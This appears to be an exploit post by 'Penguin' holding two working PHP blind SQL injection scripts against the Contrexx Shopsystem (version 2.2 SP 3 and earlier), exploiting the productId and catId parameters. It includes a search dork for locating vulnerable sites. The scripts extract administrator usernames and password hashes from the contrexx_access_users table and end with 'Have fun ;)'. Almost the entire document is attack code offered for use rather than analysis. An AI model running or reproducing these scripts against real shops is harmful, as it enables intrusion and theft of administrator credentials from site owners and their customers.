Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit Exploit PoC: index.php?section=shop&productId=[VALID productid] and [YOUR BLIND SQL CODE] Exploit tested on: Debian 6, Ubuntu Linux 11.04 Exploit found and written by: Penguin Version: =< 2.2 SP 3 Date found: 12.8.11 Dork: inurl:index.php?section=shop&productId= Vendor: www.contrexx.com Visit: www.null-sector.info Contact: Jabber -> penguin@null-sector.info #!/usr/bin/php <?php /* Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit Exploit PoC: index.php?section=shop&productId=[VALID productid] and [YOUR BLIND SQL CODE] Exploit tested on: Debian 6, Ubuntu Linux 11.04 Exploit found and written by: Penguin Version: =< 2.2 SP 3 Date found: 12.8.11 Dork: inurl:index.php?section=shop&productId= Vendor: www.contrexx.com Visit: www.null-sector.info Contact: Jabber -> penguin@null-sector.info Greets to: Blacktiger/Luxy, Leto, hAgBaRd2ooo, KrimiX, zYiix, reutz/head Important info to this Exploit: If you want to use it on a non-german site you have to edit the string in testIt "In den Warenkorb"! Known Bugs: -> Some servers response 500 - Internal Server Error. Dunno why :( -> On non-german shops you must edit the function testIt. It does not fetch a keyword automatic :/ */ echo "#######################################\r\n"; echo "# Contrexx Shopsystem Exploit #\r\n"; echo "# Exploit Type: Blind SQL Injection #\r\n"; echo "# Exploit State: Non-Public #\r\n"; echo "# Programmed by: Penguin #\r\n"; echo "#######################################\r\n"; if ($argc < 4) { echo "USAGE: ./exploit.php [TARGET] [PRODUCTID] [ADMIN ROW]\r\n"; echo "Target = ex. http://demo.site/index.php\r\n"; echo "PRODUCTID = a VALID ProductId!\r\n"; echo "Admin Row = The Exploit selects all admins and use limit [ADMIN ROW],1. Standard: 0\r\n"; } else { // There are some Config variables :) // If you know what you're doing, feel free to change them :> $target_url = $argv[1] . "?section=shop&cmd=details&productId=" . $argv[2]; $charset_start_usr = 96; $charset_end_usr = 126; $charset_hash = Array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); $toLength = 100; $myLimit = $argv[3]; // Now the Action start :) echo "Starting exploit....\r\nChecking if Vulnerable..."; $check = file_get_contents($target_url . "'"); if(testIt($check) == true) { die("Target is not Vulnerable :(\r\n"); } echo "Target is Vulnerable :)\r\n"; echo "Starting the SQL Injection...\r\n"; echo "Fetching Username...\r\n"; $username = getUsername($toLength, $charset_start_usr, $charset_end_usr, $target_url,$myLimit); $hash = getHash($toLength,$charset_hash,$target_url,$myLimit); echo "Exploited Successfully!\r\n"; echo "Full Logindata: $username : $hash\r\n"; echo "Have fun ;)\r\n"; } ///////////////////////////////////////// //Functions - Sorry, code is a bit "ugly" :) function getUsername($toLength, $charset_start, $charset_end, $target_url,$limit) { $username = ""; // Get Length $length = -1; for($i=0;$i<$toLength;$i++) { $url = $target_url . "/**/and/**/(select/**/length(username)/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1)=" . $i; $src = file_get_contents($url); if(testIt($src) == true) { $length = $i; break; } } if ($length == -1) { die("There was a problem @ fetching username length :(\r\n"); } echo "Username length: $length !\r\n"; $username = ""; echo "Username: "; for($k=0;$k<$length;$k++) { $charToAdd = ""; for($c=$charset_start;$c<$charset_end;$c++) { $p = $k+1; $src = file_get_contents($target_url . "/**/and/**/substring((select/**/username/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($c)"); if(testIt($src) == true) { $charToAdd = $c; break; } } echo chr($c); $username .= chr($c); } echo "\r\n"; return $username; } function getHash($toLength, $charset, $target_url, $limit) { // Get Hash $hash = ""; echo "Hash: "; for($k=0;$k<32;$k++) { $charToAdd = ""; for($c=0;$c<count($charset);$c++) { $p = $k+1; $z = $charset[$c]; $src = file_get_contents($target_url . "/**/and/**/substring((select/**/password/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($z)"); if(testIt($src) == true) { $charToAdd = $charset[$c]; break; } } echo chr($charToAdd); $hash .= chr($charToAdd); } echo "\r\n"; return $hash; } function testIt($src) { $check = explode("In den Warenkorb",$src); if(count($check) >= 2) { return true; } return false; } ?> -----------------OR--------------------- #!/usr/bin/php <?php /* Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit Exploit written by: Penguin Exploit: index.php?section=shop&catId=[VALID categoryid] and [YOUR BLIND SQL CODE] Exploit tested on: Debian 6, Ubuntu Linux 11.04 Software price: abount 700 CHF Found by: Penguin Version: =< 2.2 SP 3 Dork: inurl:index.php?section=shop&catId= Vendor: www.contrexx.com Visit: www.null-sector.info Greets to: Blacktiger/Luxy, ErrorX, hAgBaRd2ooo, KrimiX, zYiix, reutz/head */ echo "#######################################\r\n"; echo "# Contrexx Shopsystem Exploit #\r\n"; echo "# Exploit Type: Blind SQL Injection #\r\n"; echo "# Programmed by: Penguin #\r\n"; echo "# Visit www.null-sector.info #\r\n"; echo "#######################################\r\n"; if($argc < 4) { echo "Usage: ./exploit.php [TARGET_URL] [CATID] (Admin User Limit)\r\n"; echo "TARGET_URL = http://demo.de/index.php\r\n"; echo "CATID = CategoryId (MUST BE VALID!)\r\n"; echo "Admin User Limit = Limit x,0 @ Selecting! Standard: 0\r\n"; die(); } // Config Variables $target_url = $argv[1] . "?section=shop&catId=" . $argv[2]; $charset_start_usr = 33; $charset_end_usr = 126; $charset_hash = Array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); $toLength = 100; //Functions function getUsername($toLength, $charset_start, $charset_end, $target_url,$limit) { $username = ""; // Get Length $length = -1; for($i=0;$i<$toLength;$i++) { $url = $target_url . "/**/and/**/(select/**/length(username)/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1)=" . $i; $src = file_get_contents($url); if(testIt($src) == true) { $length = $i; break; } } if ($length == -1) { die("There was a problem @ fetching username length :(\r\n"); } echo "Username length: $length !\r\n"; $username = ""; echo "Username: "; for($k=0;$k<$length;$k++) { $charToAdd = ""; for($c=$charset_start;$c<$charset_end;$c++) { $p = $k+1; $src = file_get_contents($target_url . "/**/and/**/substring((select/**/username/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($c)"); if(testIt($src) == true) { $charToAdd = $c; break; } } echo chr($c); $username .= chr($c); } echo "\r\n"; return $username; } function getHash($toLength, $charset, $target_url,$limit) { // Get Hash $hash = ""; echo "Hash: "; for($k=0;$k<32;$k++) { $charToAdd = ""; for($c=0;$c<count($charset);$c++) { $p = $k+1; $z = $charset[$c]; $src = file_get_contents($target_url . "/**/and/**/substring((select/**/password/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($z)"); file_put_contents("test.html",$src); if(testIt($src) == true) { $charToAdd = $charset[$c]; break; } } echo chr($charToAdd); $hash .= chr($charToAdd); } echo "\r\n"; return $hash; } function testIt($src) { $check = explode("<div class=\"description\">",$src); if(count($check) >= 2) { return true; } return false; } echo "Starting exploit....\r\nChecking if Vulnerable..."; $check = file_get_contents($target_url . "'"); if(testIt($check) == true) { die("Target is not Vulnerable :(\r\n"); } $myLimit = $argv[3]; echo "Target is Vulnerable :)\r\n"; echo "Starting the SQL Injection...\r\n"; echo "Fetching Username...\r\n"; $username = getUsername($toLength, $charset_start_usr, $charset_end_usr, $target_url,$myLimit); $hash = getHash($toLength,$charset_hash,$target_url,$myLimit); echo "Exploited Successfully!\r\n"; echo "Full Logindata: $username : $hash\r\n"; echo "Have fun ;)\r\n"; ?>